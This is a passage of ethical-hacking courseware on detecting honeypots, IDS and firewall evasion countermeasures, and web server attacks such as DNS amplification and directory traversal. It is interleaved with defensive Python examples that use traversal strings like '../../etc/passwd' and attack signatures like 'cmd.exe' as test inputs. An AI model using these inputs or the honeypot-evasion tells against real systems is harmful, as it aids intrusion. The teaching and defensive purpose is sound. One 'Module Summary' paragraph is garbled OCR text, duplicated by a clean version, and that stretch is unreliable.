Detecting the presence of Sebek-based Honeypots: Sebek is a server/client-based honeypot application that captures the rootkits and other malicious malware that hijacks the read() system call. Such honeypots record all the data accessed via the read() call. Attackers can detect the existence of Sebek-based honeypots by analyzing the congestion in the network layer, as Sebek data communication is usually unencrypted. Since Sebek logs everything that is accessed via the read() call before transferring to the network, it causes the congestion effect.
Detecting the presence of Snort_inline Honeypot: Snort_inline is a modified version of Snort IDS that is capable of packet manipulation. It is mainly used in GenII (2nd generation) honeynets to block known attacks and avoid attacker bouncing. It can rewrite rules in the iptables. Attackers can identify these honeypots by analyzing the outgoing packets. If an outgoing packet is dropped, it might look like a black hole to an attacker, and when the snort_inline modifies an outgoing packet, the attacker can capture the modified packet through another host system and identify the packet modification.
Detecting the presence of Fake AP: Fake access points are those that create fake 802.11b beacon frames with randomly generated ESSID and BSSID (MAC address) assignments. Fake access points only send beacon frames but do not produce any fake traffic on the access points, and an attacker can monitor the network traffic and quickly note the presence of fake AP.
Detecting the presence of Bait and Switch Honeypots: Bait and switch honeypots actively participate in security mechanisms that are employed to respond quickly to incoming threats and malicious attempts. They redirect all malicious network traffic to a honeypot after any intrusion attempt is detected. An attacker can identify the presence of such honeypots by looking at specific TCP/IP parameters such as the Round-Trip Time (RTT), the Time To Live (TTL), and the TCP timestamp.
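A honeypot operator can check their own decoys for two of the fingerprints listed above (a VMware vendor prefix in the MAC address, and the Layer 4 tar pit habit of acknowledging forever with a zero window) before an attacker does. The Python below is an added example, not code from the book; the VMware OUI list is an assumption taken from the IEEE OUI registry as this example understands it and should be checked against the current registry, and the TCP segment traces are constructed.

```python
# OUI prefixes registered to VMware in the IEEE registry (assumption of this
# example; verify against the current registry before relying on the list).
VMWARE_OUIS = {"00:05:69", "00:0c:29", "00:1c:14", "00:50:56"}

# Constructed TCP segment traces as seen from the decoy's side: (flags, window).
# The tar pit answers the handshake, then keeps ACKing with a zero window.
TARPIT_TRACE = [("SYN-ACK", 10), ("ACK", 0), ("ACK", 0), ("ACK", 0), ("ACK", 0)]
NORMAL_TRACE = [("SYN-ACK", 65535), ("ACK", 65535), ("ACK", 64240), ("ACK", 65535)]


def normalize_mac(mac):
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabb.ccdd.eeff; return aa:bb:cc:dd:ee:ff."""
    digits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError("not a 48-bit MAC: %r" % mac)
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def is_vmware_mac(mac):
    """True when the first three octets match a VMware OUI."""
    return normalize_mac(mac)[:8] in VMWARE_OUIS


def looks_like_layer4_tarpit(segments, min_zero_acks=3):
    """True when the peer keeps acknowledging while advertising a zero window for at
    least min_zero_acks consecutive segments, the tell the text attributes to Labrea."""
    run = 0
    for flags, window in segments:
        if "ACK" in flags and window == 0:
            run += 1
            if run >= min_zero_acks:
                return True
        else:
            run = 0
    return False


def audit_decoy(mac, segments):
    """Return the list of fingerprints a decoy exposes to a probing attacker."""
    tells = []
    if is_vmware_mac(mac):
        tells.append("VMware OUI in MAC address")
    if looks_like_layer4_tarpit(segments):
        tells.append("persistent zero-window ACKs")
    return tells


if __name__ == "__main__":
    print(audit_decoy("00:50:56:12:34:56", TARPIT_TRACE))
    print(audit_decoy("3c:22:fb:01:02:03", NORMAL_TRACE))
```

The MAC check is cheap to fix on the operator side (assign a locally administered address to the decoy's virtual NIC); the zero-window tell is inherent to how a Layer 4 tar pit works, so it is a trade-off to accept knowingly rather than a defect to remove.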

Honeypot Detection Tools
Attackers use honeypot detection tools such as Send-Safe Honeypot Hunter (http://www.send-safe.com) and kippo_detect (https://github.com) to detect honeypots in the target organizational networks.
- Send-Safe Honeypot Hunter
Source: http://www.send-safe.com
Send-Safe Honeypot Hunter is a tool designed for checking lists of HTTPS and SOCKS proxies for "honey pots."
Features:
- Checks lists of HTTPS, SOCKS4, and SOCKS5 proxies with any ports
- Checks several remote or local proxy lists at once
- Can upload "Valid proxies" and "All except honeypots" files to FTP
- Can process proxy lists automatically in every specified period
- May be used for usual proxy list validating as well
Figure 12.59: Screenshot of Send-Safe Honeypot Hunter
IDS/Firewall Evasion Countermeasures
The previous sections discussed various tools and techniques used by attackers to bypass network security perimeters such as IDS, firewalls, and honeypots to enter target networks. It is necessary to deploy and configure these security mechanisms securely to avoid attacks. This section discusses various countermeasures and best practices for hardening such network security perimeters.

How to Defend Against IDS Evasion
- Shut down switch ports associated with known attack hosts.
- Perform an in-depth analysis of ambiguous network traffic for all possible threats.
- Use TCP FIN or Reset (RST) packet to terminate malicious TCP sessions.
- Look for the nop opcode other than 0x90 to defend against the polymorphic shellcode problem.
- Train users to identify attack patterns and regularly update/patch all the systems and network devices.
- Deploy IDS after a thorough analysis of the network topology, nature of network traffic, and number of hosts to monitor.
- Use a traffic normalizer to remove potential ambiguity from the packet stream before it reaches the IDS.
- Ensure that IDS normalize fragmented packets and allow those packets to be reassembled in the proper order.
- Define DNS server for client resolver in routers or similar network devices.
- Harden the security of all communication devices such as modems, routers, etc.
- If possible, block ICMP TTL expired packets at the external interface level and change the TTL field to a considerable value, ensuring that the end host always receives the packets.
- Regularly update the antivirus signature database.
- Use a traffic normalization solution at the IDS to protect the system from evasions.
- Store the attack information (attacker IP, victim IP, timestamp) for future analysis.
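The normalizer and reassembly points above exist because an IDS that resolves overlapping fragments differently from the end host sees a different payload than the host does. The Python below, an added example that is not the book's code, reassembles a constructed fragment set under first-wins, last-wins and reject policies and shows that a signature appears under only one of them, which is why a normalizer in front of the IDS should refuse conflicting overlaps rather than guess. The fragment tuples, the signature list and the policy names are this example's assumptions.

```python
# Constructed fragment set: (byte offset, data, more_fragments_flag). The second
# fragment overlaps the tail of the first with different bytes, the ambiguity an
# insertion/evasion attack relies on.
OVERLAPPING_FRAGMENTS = [
    (0, b"GET /index.html", True),
    (5, b"../cmd.exe", False),
]
# Constructed clean fragment set with no overlap.
CLEAN_FRAGMENTS = [
    (0, b"GET /ind", True),
    (8, b"ex.html", False),
]
SIGNATURES = [b"cmd.exe", b"/bin/sh"]   # assumed content signatures for the demo


def reassemble(fragments, policy="reject"):
    """Rebuild the payload from fragments under one overlap policy.

    policy: 'first'  keeps bytes that arrived first (one family of host stacks),
            'last'   lets later fragments overwrite (another family),
            'reject' raises ValueError on any conflicting overlap, which is what a
                     normalizer in front of an IDS should do so it never has to guess.
    Gaps and a missing final fragment also raise ValueError.
    """
    if not fragments:
        raise ValueError("no fragments")
    seen = {}
    total = None
    for offset, data, more in fragments:
        if not more:
            total = offset + len(data)
        for i, byte in enumerate(data):
            pos = offset + i
            if pos in seen and seen[pos] != byte:
                if policy == "reject":
                    raise ValueError("conflicting overlap at byte %d" % pos)
                if policy == "first":
                    continue
            seen[pos] = byte
    if total is None:
        raise ValueError("last fragment (MF=0) never arrived")
    missing = [p for p in range(total) if p not in seen]
    if missing:
        raise ValueError("gap at byte %d" % missing[0])
    return bytes(seen[p] for p in range(total))


def matches_signature(payload, signatures=SIGNATURES):
    """True when any signature byte string occurs in the reassembled payload."""
    return any(sig in payload for sig in signatures)


def inspect_fragments(fragments, policy):
    """Reassemble under policy and report (payload or None, alert)."""
    try:
        payload = reassemble(fragments, policy)
    except ValueError:
        return None, True    # unreassemblable traffic is itself an alert condition
    return payload, matches_signature(payload)


if __name__ == "__main__":
    for policy in ("first", "last", "reject"):
        print(policy, inspect_fragments(OVERLAPPING_FRAGMENTS, policy))
```

Under the first-wins view the request looks like a harmless GET; under last-wins the same fragments spell out the signature. The IDS cannot know which view the destination host will take, so the reject policy (or normalizing the stream so that only one view can reach the host) is the defensible choice.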

How to Defend Against Firewall Evasion
- The firewall should be configured such that the IP address of an intruder should be filtered out.
- Set the firewall ruleset to deny all traffic and enable only the services required.
- If possible, create a unique user ID to run the firewall services instead of running the services using the administrator or root ID.
- Configure a remote syslog server and adopt strict measures to protect it from malicious
- Monitor firewall logs at regular intervals and investigate all suspicious log entries found.
- By default, disable all FTP connections to or from the network.
- Catalog and review all inbound and outbound traffic allowed through the firewall.
- Run regular risk queries to identify vulnerable firewall rules.
- Monitor user access to firewalls and control who can modify the firewall configuration.
- Specify the source and destination IP addresses as well as the ports.
- Notify the security policy administrator about firewall changes and document them.
- Control physical access to the firewall.
- Take regular backups of the firewall rule set and configuration files.
- Schedule regular firewall security audits.
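Several of the points above (a deny-all default, explicit source, destination and port on every rule, and regular queries for vulnerable rules) can be checked mechanically. The Python below is an added example, not a vendor tool or the book's code; it audits a constructed first-match rule list for any/any allows, rules shadowed by an earlier broader rule, and a missing final default deny. The rule format and the finding wording are this example's own assumptions.

```python
import ipaddress

# Constructed rule sets in a minimal first-match format (not any vendor's syntax).
# Addresses are from the documentation ranges.
WEAK_RULES = [
    {"id": 1, "action": "allow", "src": "0.0.0.0/0", "dst": "203.0.113.10/32", "proto": "tcp", "dport": 443},
    {"id": 2, "action": "allow", "src": "0.0.0.0/0", "dst": "0.0.0.0/0", "proto": "any", "dport": "any"},
    {"id": 3, "action": "deny", "src": "0.0.0.0/0", "dst": "203.0.113.10/32", "proto": "tcp", "dport": 23},
]
HARDENED_RULES = [
    {"id": 1, "action": "allow", "src": "0.0.0.0/0", "dst": "203.0.113.10/32", "proto": "tcp", "dport": 443},
    {"id": 2, "action": "allow", "src": "198.51.100.0/24", "dst": "203.0.113.10/32", "proto": "tcp", "dport": 22},
    {"id": 3, "action": "deny", "src": "0.0.0.0/0", "dst": "0.0.0.0/0", "proto": "any", "dport": "any"},
]


def _net(cidr):
    return ipaddress.ip_network(cidr, strict=False)


def covers(outer, inner):
    """True if every packet matched by rule `inner` is also matched by `outer`."""
    if not _net(outer["src"]).supernet_of(_net(inner["src"])):
        return False
    if not _net(outer["dst"]).supernet_of(_net(inner["dst"])):
        return False
    if outer["proto"] != "any" and outer["proto"] != inner["proto"]:
        return False
    if outer["dport"] != "any" and outer["dport"] != inner["dport"]:
        return False
    return True


def is_any_any(rule):
    """A rule with no source, destination, protocol or port restriction at all."""
    return (rule["src"] == "0.0.0.0/0" and rule["dst"] == "0.0.0.0/0"
            and rule["proto"] == "any" and rule["dport"] == "any")


def audit(rules):
    """Return a list of findings; an empty list means the checks all passed."""
    findings = []
    for i, rule in enumerate(rules):
        if rule["action"] == "allow" and is_any_any(rule):
            findings.append("rule %d allows any source to any destination on any port" % rule["id"])
        # First-match semantics: an earlier rule that covers this one makes it dead.
        for earlier in rules[:i]:
            if covers(earlier, rule):
                findings.append("rule %d is shadowed by rule %d and never matches"
                                % (rule["id"], earlier["id"]))
                break
    if not rules or rules[-1]["action"] != "deny" or not is_any_any(rules[-1]):
        findings.append("rule set does not end with a default deny")
    return findings


if __name__ == "__main__":
    for name, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(name, audit(rules) or ["no findings"])
```

The shadowing check is the one that catches the classic mistake in the weak set: the telnet deny on rule 3 looks like a control but never fires because the any/any allow above it matches first. Real rule bases also need the port-range and negation forms, but the covering relation stays the same.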

Module Summary

Inthis
>
mode,
have
theand
we discussedfollowing
honeypot
105,18,frewal.and concepts solutions

to bypass Sean
\oroustechnigvs firewalls
Vriout105/Fewall
vation tools

Weconcludedwithadetaleddzcusson on various countermeasurestht should


be
i n order
‘employe t o preven I0S/Frewall
evasion attemptsbythreatactors
Inthe nextmad,
perform
pen-testes,
hhumbers
web
andpasswords
wehacking hackers
server
wl cuts in deta ow attackers,a swelas etic
formationsuch
to getvaluable
and
scedt card

Module Summary
This module discussed different IDS, IPS, firewall, and honeypot concepts and solutions. It also described various techniques for bypassing IDS and firewalls. In addition, it illustrated various IDS/firewall evasion tools. Further, it explained how to detect and defeat honeypots. Finally, it ended with a detailed discussion of various countermeasures to be adopted to prevent IDS/Firewall evasion attempts by threat actors.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-testers perform web server hacking to gain valuable information such as credit card numbers and passwords.

Module 13: Hacking Web Servers
Module Objectives
Most organizations consider their web presence to be an extension of themselves. Organizations maintain websites associated with their business on the World Wide Web to establish their web presence. Web servers are a critical component of web infrastructure. A single vulnerability in web server configuration may lead to a security breach on websites. Therefore, web server security is critical to the normal functioning of an organization.
This module starts with an overview of web server concepts. Subsequently, it provides insight into various web-server attacks, attack methodologies, and attack tools. Later, the module describes countermeasures against web server attacks, patch management, and security tools.

At the end of this module, you will be able to do the following:
- Describe web server concepts
- Perform various web server attacks
- Describe web server attack methodology
- Use different web server attack tools
- Apply web server attack countermeasures
- Describe patch management concepts
- Use different web server security tools

Web Server Concepts
To understand web server hacking, it is essential to understand web server concepts, including what a web server is, how it functions, and other elements associated with it.
This section provides a brief overview of a web server and its architecture. It will also explain common factors or mistakes that allow attackers to hack a web server. This section also describes the impact of attacks on web servers.

Web Server Operations
A web server is a computer system that stores, processes, and delivers web pages to global clients via the Hypertext Transfer Protocol (HTTP). In general, a client initiates a communication process through HTTP requests. When a client desires to access any resource such as web pages, photos, and videos, the client's browser generates an HTTP request that is sent to the web server. Depending on the request, the web server collects the requested information/content from the data storage servers or application and responds to the client's request with an appropriate HTTP response. If a web server cannot find the requested information, then it generates an error message.

Figure 13.1: Typical client-server communication in web server operation

Components of a Web Server
A web server consists of the following components:
- Document Root
The document root is one of the root file directories of the web server that stores critical HTML files related to the web pages of a domain name, which will be sent in response to requests.
For example, if the requested URL is www.certifiedhacker.com and the document root is named "certroot" and is stored in the directory /admin/web, then /admin/web/certroot is the document directory address. If the complete request is www.certifiedhacker.com/P-folio/index.html, the server will search for the file path /admin/web/certroot/P-folio/index.html.
- Server Root
It is the top-level root directory under the directory tree in which the server's configuration and error, executable, and log files are stored. It consists of the code that implements the server. The server root, in general, consists of four files. One file is dedicated to the code that implements the server, while the other three are subdirectories, namely, -conf, -logs, and -cgi-bin, which are used for configuration information, logs, and executables, respectively.
- Virtual Document Tree
A virtual document tree provides storage on a different machine or disk after the original disk becomes full. It is case-sensitive and can be used to provide object-level security. In the above example under document root, for a request of www.certifiedhacker.com/P-folio/index.html, the server can also search for the file path /admin/web/certroot/P-folio/index.html if the directory admin/web/certroot is stored in another disk.
- Virtual Hosting
It is a technique of hosting multiple domains or websites on the same server. This technique allows sharing of resources among various servers. It is employed in large-scale companies, in which company resources are intended to be accessed and managed globally. The following are the types of virtual hosting:
  o Name-based hosting
  o Internet Protocol (IP)-based hosting
  o Port-based hosting

- Web Proxy
A proxy server is located between the web client and web server. Owing to the placement of web proxies, all requests from clients are passed on to the web server through the web proxies. They are used to prevent IP blocking and maintain anonymity.
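The mapping from request URL to a file under the document root described above is also where path traversal starts, so a server must refuse any request that would step above the root. The Python below, an added example that is not the book's code, resolves request paths against the book's example document root /admin/web/certroot and rejects traversal segments, their percent-encoded forms, and NUL bytes. The default document name and the choice to reject rather than silently clamp traversal are this example's assumptions.

```python
import posixpath
from urllib.parse import unquote

DOCUMENT_ROOT = "/admin/web/certroot"   # document root from the text's example


def resolve_request_path(document_root, request_path, default_document="index.html"):
    """Map a request path onto a file path under document_root.

    Returns the resolved path, or None when the request must be refused
    (traversal segments, NUL bytes). Percent-encoding is decoded first so that
    %2e%2e cannot slip past the traversal check.
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None
    path_only = decoded.split("?", 1)[0]            # drop the query string
    segments = [s for s in path_only.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None                                 # refuse rather than clamp
    if not segments:
        segments = [default_document]               # assumed default document
    root = posixpath.normpath(document_root)
    candidate = posixpath.join(root, *segments)
    # Defence in depth: the result must still lie inside the root.
    if not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: the book's example plus traversal attempts.
    for req in ("/P-folio/index.html", "/", "/../../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd"):
        print("%-28s -> %s" % (req, resolve_request_path(DOCUMENT_ROOT, req)))
```

Refusing a request that contains ".." after decoding, instead of normalizing it away, also gives the access log an unambiguous record of the probe. Serving from a virtual document tree on another disk, as described above, would add a second root to try after the first, with the same containment check applied to each.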
Open-source Web Server Architecture
Open-source web server architecture typically uses Linux, Apache, MySQL, and PHP, often called the LAMP software bundle, as the principal components.
The following are the functions of the principal components in open-source web server architecture:
- Linux is the operating system (OS) of the web server and provides a secure platform
- Apache is the component of the web server that handles each HTTP request and response
- MySQL is a relational database used to store the content and configuration information of the web server
- PHP is the application layer technology used to generate dynamic web content

Figure 13.2: Functions of the principal components of the open-source web server architecture
IIS Web Server Architecture

The Internet Information Service (IIS) is a web server application developed by Microsoft for Windows. IIS for Windows Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web. It supports HTTP, HTTP Secure (HTTPS), File Transfer Protocol (FTP), FTP Secure (FTPS), Simple Mail Transfer Protocol (SMTP), and Network News Transfer Protocol (NNTP).

It has several components, including a protocol listener such as HTTP.sys and services such as the World Wide Web Publishing Service (WWW Service) and Windows Process Activation Service (WAS). Each component functions in application and web server roles. These functions may include listening to requests, managing processes, and reading configuration files.


Web Server Security Issues
A web server is a hardware/software application that hosts websites and makes them accessible over the Internet. A web server, along with a browser, successfully implements client-server model architecture. In this model, the web server plays the role of the server, and the browser acts as the client. To host websites, a web server stores the web pages of websites and delivers a particular web page upon request. Each web server has a domain name and an IP address associated with that domain name. A web server can host more than one website. Any computer can act as a web server if it has specific server software (a web server program) installed and is connected to the Internet.
Web servers are chosen based on their capability to handle server-side programming, security characteristics, publishing, search engines, and site-building tools. Apache, Microsoft IIS, Nginx, Google, and Tomcat are some of the most widely used web server software. An attacker usually targets vulnerabilities in the software component and configuration errors to compromise web servers.

Figure 13.4: Conceptual diagram of a web server: the user visits websites hosted on a web server
Organizations can defend most network-level and OS-level attacks by adopting network security measures such as firewalls, intrusion detection systems (IDSs), and intrusion prevention systems (IPSs) and by following security standards and guidelines. This forces attackers to turn their attention to web-server- and web-application-level attacks because a web server that hosts web applications is accessible from anywhere over the Internet. This makes web servers an attractive target. Poorly configured web servers can create vulnerabilities in even the most carefully designed firewall systems. Attackers can exploit poorly configured web servers with known vulnerabilities to compromise the security of web applications. Furthermore, web servers with known vulnerabilities can harm the security of an organization. As shown in the below figure, organizational security includes seven levels from stack 1 to stack 7.

Figure 13.5: Levels of organizational security (custom web applications: business logic flaws; third-party components: open source/commercial; web server: Apache/Microsoft IIS; database; operating system: Windows/Linux/OS X)
Common Goals behind Web Server Hacking
Attackers perform web server attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of a web server and steal sensitive information for financial gains or merely for the sake of curiosity. The following are some common goals of web server attacks:

▪ Stealing credit-card details or other sensitive credentials using phishing techniques
▪ Integrating the server into a botnet to perform denial of service (DoS) or distributed DoS (DDoS) attacks
▪ Compromising a database
▪ Obtaining closed-source applications
▪ Hiding and redirecting traffic
▪ Escalating privileges

Some attacks are performed for personal reasons, rather than financial gains:
▪ For pure curiosity
▪ For completing a self-set intellectual challenge
▪ For damaging the target organization's reputation

Dangerous Security Flaws Affecting Web Server Security
A web server configured by poorly trained system administrators may have security vulnerabilities. Inadequate knowledge, negligence, laziness, and inattentiveness toward security can pose the greatest threats to web server security. The following are some common oversights that make a web server vulnerable to attacks:
▪ Failing to update the web server with the latest patches
▪ Using the same system administrator credentials everywhere
▪ Allowing unrestricted internal and outbound traffic
▪ Running unhardened applications and servers

Impact of Web Server Attacks

Attackers can cause various kinds of damage to an organization by attacking a web server. The following are some of the types of damage that attackers can cause to a web server.
▪ Compromise of user accounts: Web server attacks mostly focus on compromising user accounts. If the attacker compromises a user account, they can gain a large amount of useful information. The attacker can use the compromised user account to launch further attacks on the web server.
▪ Website defacement: Attackers can completely change the appearance of a website by replacing its original data. They deface the target website by changing the visuals and displaying different pages with messages of their own.
▪ Secondary attacks from the website: An attacker who compromises a web server can use the server to launch further attacks on various websites or client systems.
▪ Root access to other applications or server: Root access is the highest privilege level to login to a server, irrespective of whether the server is a dedicated, semi-dedicated, or virtual private server. Attackers can perform any action once they attain root access to the server.
▪ Data tampering: An attacker can alter or delete the data of a web server and even replace the data with malware to compromise users who connect to the web server.
▪ Data theft: Data are among the primary assets of an organization. Attackers can attain access to sensitive data such as financial records, future plans, or the source code of a program.
▪ Damage reputation of the company: Web server attacks may expose the personal information of a company's customers to the public, damaging the reputation of the company. Consequently, customers lose faith in the company and become afraid of sharing their personal details with the company.

Why are Web Servers Compromised?

There are inherent security risks associated with web servers, the local area networks (LANs) that host websites, and the end users who access these websites using browsers.
▪ Webmaster's perspective: From a webmaster's perspective, the greatest security concern is that a web server can expose the LAN or corporate intranet to threats posed by the Internet. These threats may be in the form of viruses, Trojans, attackers, or the compromise of data. Bugs in software programs are often sources of security lapses. Web servers, which are large and complex devices, also have these inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while responding to remote requests. Any Common Gateway Interface (CGI) script installed in the web server may contain bugs that are potential security holes.
▪ Network administrator's perspective: From a network administrator's perspective, a poorly configured web server causes potential holes in the LAN's security. While the objective of the web server is to provide controlled access to the network, excess control can make the web almost impossible to use. In an intranet environment, the network administrator must configure the web server carefully so that legitimate users are recognized and authenticated, and groups of users are assigned distinct access privileges.
▪ End user's perspective: Usually, the end user does not perceive any immediate threat, because surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, make it possible for harmful applications, such as viruses, to invade the user's system. In addition, active content from a website that is displayed by the user's browser can be used as a conduit for malicious software to bypass the firewall system and permeate the LAN.

The following are some oversights that can compromise a web server:
▪ Improper file and directory permissions
▪ Installing the server with default settings
▪ Unnecessary services enabled, including content management and remote administration
▪ Security conflicts with the business' ease-of-use requirements
▪ Lack of proper security policy, procedures, and maintenance
▪ Improper authentication with external systems
▪ Default accounts with default or no passwords
▪ Unnecessary default, backup, or sample files
▪ Misconfigurations in the web server, OS, and networks
▪ Bugs in server software, OS, and web applications
▪ Misconfigured Secure Sockets Layer (SSL) certificates and encryption settings
▪ Administrative or debugging functions that are enabled or accessible on web servers
▪ Use of self-signed certificates and default certificates

Module Flow: Web Server Concepts, Web Server Attacks, Web Server Attack Methodology, Countermeasures, Patch Management, Web Server Security Tools

Web Server Attacks
An attacker can use many techniques to compromise a web server, such as DoS/DDoS, Domain Name System (DNS) server hijacking, DNS amplification, directory traversal, man in the middle (MITM)/sniffing, phishing, website defacement, web server misconfiguration, HTTP response splitting, web cache poisoning, Secure Shell (SSH) brute force, and web server password cracking. This section describes these attack techniques in detail.

DoS/DDoS Attacks
A DoS/DDoS attack involves flooding targets with copious fake requests so that the target stops functioning and becomes unavailable to legitimate users. By using a web server DoS/DDoS attack, an attacker attempts to take the web server down or make it unavailable to legitimate users. A web server DoS/DDoS attack often targets high-profile web servers such as bank servers, credit-card payment gateways, and even root name servers.

To crash a web server running an application, the attacker targets the following services to consume the web server's resources with fake requests:
▪ Network bandwidth
▪ Server memory
▪ Application exception handling mechanism
▪ CPU usage
▪ Hard-disk space
▪ Database space

DNS Server Hijacking
The Domain Name System (DNS) resolves a domain name to its corresponding IP address. A user queries the DNS server with a domain name, and the DNS server responds with the corresponding IP address.

In DNS server hijacking, an attacker compromises a DNS server and changes its mapping settings to redirect toward a rogue DNS server that would redirect the user's requests to the attacker's rogue server. Consequently, when the user enters a legitimate URL in a browser, the settings will redirect to the attacker's fake site.

Figure 13.7: DNS server hijacking
DNS Amplification Attack
Recursive DNS query is a method of requesting DNS mapping. The query goes through DNS servers recursively until it fails to find the specified domain name to IP address mapping.
The following are the steps involved in processing recursive DNS requests; these steps are illustrated in the below figure.
▪ Step 1: Users who desire to resolve a domain name to its corresponding IP address send a DNS query to the primary DNS server specified in its Transmission Control Protocol (TCP)/IP properties.
▪ Steps 2 to 7: If the requested DNS mapping does not exist on the user's primary DNS server, the server forwards the request to the root server. The root server forwards the request to the .com namespace, where the user can find DNS mappings. This process repeats recursively until the DNS mapping is resolved.
▪ Step 8: Ultimately, when the system finds the primary DNS server for the requested DNS mapping, it generates a cache for the IP address in the user's primary DNS server.

Figure 13.8: Recursive DNS query

Attackers exploit recursive DNS queries to perform a DNS amplification attack that results in DDoS attacks on the victim's DNS server. The following are the steps involved in a DNS amplification attack; these steps are illustrated in the below figure.
▪ Step 1: The attacker instructs compromised hosts (bots) to make DNS queries in the network.
▪ Step 2: All the compromised hosts spoof the victim's IP address and send DNS query requests to the primary DNS server configured in the victim's TCP/IP settings.

▪ Steps 3 to 8: If the requested DNS mapping does not exist on the victim's primary DNS server, the server forwards the requests to the root server. The root server forwards the request to the .com or respective top-level domain (TLD) namespaces. This process repeats recursively until the victim's primary DNS server resolves the DNS mapping request.
▪ Step 9: After the primary DNS server finds the DNS mapping for the victim's request, it sends a DNS mapping response to the victim's IP address. This response goes to the victim because bots use the victim's IP address. The replies to copious DNS mapping requests from the bots result in DDoS on the victim's DNS server.

Figure 13.9: DNS amplification attack
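The steps above describe the flood from the attacker's side. From the resolver operator's side the same pattern shows up in the query log: one claimed source address receiving many answers that are far larger than the queries that triggered them. The following is an added example written for this section (it is not courseware code); the log records and the RFC 5737 documentation addresses in it are constructed, and the thresholds are assumptions to tune per resolver.

```python
"""Added example: spotting amplification abuse in a resolver's query log."""
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed records, not real traffic:
# (claimed source IP, query type, request bytes, response bytes)
SAMPLE_RECORDS: List[Tuple[str, str, int, int]] = (
    [("203.0.113.10", "ANY", 64, 3200)] * 40   # one "source" gets many large answers
    + [("198.51.100.5", "A", 60, 120)] * 5     # ordinary lookups
    + [("198.51.100.7", "AAAA", 62, 140)] * 3
)


def amplification_report(records, min_responses: int = 20,
                         min_factor: float = 10.0) -> List[Dict]:
    """Group answers by claimed source and flag sources whose aggregate
    response/request byte ratio (the amplification factor) is high.

    Because the bots spoof the victim's address, the "source" seen by the
    resolver is really the destination of the flood (step 9 in the text).
    """
    req_bytes = defaultdict(int)
    resp_bytes = defaultdict(int)
    count = defaultdict(int)
    for src, _qtype, req, resp in records:
        req_bytes[src] += req
        resp_bytes[src] += resp
        count[src] += 1

    flagged = []
    for src, n in count.items():
        factor = resp_bytes[src] / req_bytes[src]
        if n >= min_responses and factor >= min_factor:
            flagged.append({"src": src, "responses": n, "factor": round(factor, 1)})
    # Highest amplification first
    return sorted(flagged, key=lambda f: f["factor"], reverse=True)


if __name__ == "__main__":
    for finding in amplification_report(SAMPLE_RECORDS):
        print(f"{finding['src']}: {finding['responses']} answers, "
              f"amplification x{finding['factor']}")
```

A flagged source is a candidate for response rate limiting on the resolver; refusing recursion to clients outside the network the resolver serves removes the open-resolver condition the attack needs, and ingress filtering of spoofed source addresses at the network edge (BCP 38) stops the spoofing itself.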
Directory Traversal Attacks
An attacker may be able to perform a directory traversal attack owing to a vulnerability in the code of a web application. In addition, poorly patched or configured web server software can make the web server vulnerable to a directory traversal attack.

The design of web servers limits public access to some extent. Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside the web server's root directory by manipulating a Uniform Resource Locator (URL). In directory traversal attacks, attackers use the dot-dot-slash (../) sequence to access restricted directories outside the web server's root directory. Attackers can use the trial-and-error method to navigate outside the root directory and access sensitive information in the system.

An attacker exploits the web server software (web server program) to perform directory traversal attacks. The attacker usually performs this attack with the help of a browser. A web server is vulnerable to this attack if it accepts input data from a browser without proper validation.

Figure 13.10: Directory traversal attack
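The text says the server is vulnerable when it accepts the requested path without proper validation. The following added example (illustrative code, not from the courseware or any real web server) shows the naive path handling that lets a dot-dot-slash sequence escape the web root beside a containment check that refuses it; the web root /srv/www and the function names are assumptions.

```python
"""Added example: checking a requested path against the web root."""
import os
from typing import Optional
from urllib.parse import unquote


def resolve_unsafe(web_root: str, requested: str) -> str:
    """Vulnerable pattern: join and normalise without a containment check.

    A request for ../../etc/passwd under /srv/www resolves to /etc/passwd,
    which is exactly the escape the text describes.
    """
    return os.path.normpath(os.path.join(web_root, unquote(requested)))


def resolve_safe(web_root: str, requested: str) -> Optional[str]:
    """Return the absolute file path if it lies inside web_root, else None.

    The containment test runs on the canonical path (realpath, so symlinks
    are followed) after URL-decoding, so "%2e%2e%2f" and "../" are treated
    alike. Decoding twice is a deliberately conservative choice that also
    catches double-encoded sequences such as "%252e%252e%252f".
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:  # NUL bytes truncate paths in C-based servers
        return None
    root = os.path.realpath(web_root)
    # Leading separators are stripped so "/index.html" is relative to the
    # web root rather than to the filesystem root.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/\\")))
    # Compare with the separator appended so "/srv/wwwevil" does not pass as a
    # child of "/srv/www".
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    for path in ["index.html", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"]:
        print(f"{path!r:32} unsafe -> {resolve_unsafe('/srv/www', path)}"
              f"   safe -> {resolve_safe('/srv/www', path)}")
```

Serving only from an allowlist of files, or running the server in a chroot or container whose filesystem holds nothing but the site, limits the damage even if the check is ever bypassed.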
Man-in-the-Middle/Sniffing Attack
Man-in-the-middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end user and web servers. In an MITM attack or sniffing attack, an intruder intercepts or modifies the messages exchanged between the user and web server by eavesdropping or intruding into a connection. This allows an attacker to steal sensitive user information, such as online banking details, usernames, and passwords, transferred over the Internet to the web server. The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and accepts the attacker's request, then all the communication between the user and web server passes through the attacker. In this manner, the attacker can steal sensitive user information.

Figure 13.11: Man-in-the-middle/sniffing attack
Phishing Attacks
